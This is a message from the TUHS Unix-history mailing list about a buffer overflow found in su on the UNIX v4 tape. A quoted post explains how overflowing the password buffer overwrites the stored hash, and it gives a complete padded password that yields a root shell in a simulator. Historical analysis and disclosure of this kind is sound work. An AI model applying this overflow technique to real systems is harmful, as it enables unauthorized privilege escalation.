[TUHS] Buffer overflow found/fixed in v4 tape ;)
Dan Cross via TUHS
tuhs at tuhs.org
Wed Jan 14 00:35:13 AEST 2026
On Mon, Jan 12, 2026 at 11:49 PM Craig B Agricola via TUHS
<tuhs at tuhs.org> wrote:
> On Mon, Jan 05, 2026 at 12:08:14PM -0500, Paul Winalski via TUHS wrote:
> > The problem with that philosophy is that a buffer overflow doesn't
> > necessarily lead to a program crash. A program crash is the lucky
> > outcome. If you're unlucky you will silently get the wrong answer, or
> > other misbehavior.
>
> In fact, in this case, far from just a program crash, you have a trivial
> privilege escalation. I'll repeat what I posted on the Metzdowd
> Cryptography list[1].
>
> Since the buffer that you're comparing the crypt() of the input against
> is immediately after the buffer for the input, all you have to do is pad
> out the input to overwrite the hash that was read from /etc/passwd to
> the known hash of the beginning of your password input. crypt() of that
> era only takes into account the first 8 characters of the password. So,
> for instance, from an unprivileged user account, providing the following
> password to su gives you a root shell.
>
> abcdefghxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx5WWWWWWW:
>
> It's pretty quick to spin up a fresh simulator with the UNIX v4 tape
> install, create a user account, and then try to su with that password.
I have a (very) vague memory that this was a known attack at some
point in the past, but I no longer remember where I picked that up.
Probably from discussions with the local sysadmins when I was in high
school.
- Dan C.
More information about the TUHS
mailing list